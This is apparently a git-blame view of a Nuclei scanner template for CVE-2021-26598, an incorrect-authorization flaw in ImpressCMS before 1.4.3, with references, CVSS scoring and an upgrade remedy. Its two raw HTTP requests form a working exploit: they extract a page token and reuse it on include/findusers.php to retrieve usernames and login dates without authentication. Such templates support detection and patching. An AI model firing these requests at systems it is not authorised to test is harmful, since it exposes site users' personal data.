2022-04-03 02:23:45 +00:00
id : CVE-2021-26598
info :
2023-04-04 21:16:47 +00:00
name : ImpressCMS <1.4.3 - Incorrect Authorization
2022-04-03 02:23:45 +00:00
author : gy741,pdteam
severity : medium
2023-04-04 21:16:47 +00:00
description : ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability.
2022-04-03 02:23:45 +00:00
reference :
- https://hackerone.com/reports/1081137
2022-04-04 18:27:11 +00:00
- http://karmainsecurity.com/KIS-2022-03
2022-04-04 18:43:18 +00:00
- https://github.com/ImpressCMS
2022-04-04 18:27:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-26598
2022-04-05 13:17:39 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2022-04-05 13:17:39 +00:00
cve-id : CVE-2021-26598
cwe-id : CWE-287
2023-10-18 16:26:30 +00:00
epss-score : 0.00506
2023-10-19 10:38:59 +00:00
epss-percentile : 0.73787
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:*
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : impresscms
product : impresscms
2023-09-06 12:09:01 +00:00
shodan-query : http.html:"ImpressCMS"
2022-08-27 04:41:18 +00:00
tags : hackerone,cve,cve2021,impresscms,unauth,cms
2022-04-03 02:23:45 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-03 02:23:45 +00:00
- raw :
- |
GET /misc.php?action=showpopups&type=friend HTTP/1.1
Host : {{Hostname}}
User-Agent : Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
- |
GET /include/findusers.php?token={{token}} HTTP/1.1
Host : {{Hostname}}
User-Agent : Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
cookie-reuse : true
req-condition : true
2023-07-11 19:49:27 +00:00
2022-04-03 02:23:45 +00:00
matchers-condition : and
matchers :
- type : word
part : body_2
words :
- 'last_login'
- 'user_regdate'
2022-04-04 18:27:11 +00:00
- 'uname'
2022-04-03 02:23:45 +00:00
condition : and
- type : status
status :
- 200
extractors :
- type : regex
name : token
group : 1
regex :
- "REQUEST' value='(.*?)'"
- 'REQUEST" value="(.*?)"'
2023-07-11 19:49:27 +00:00
internal : true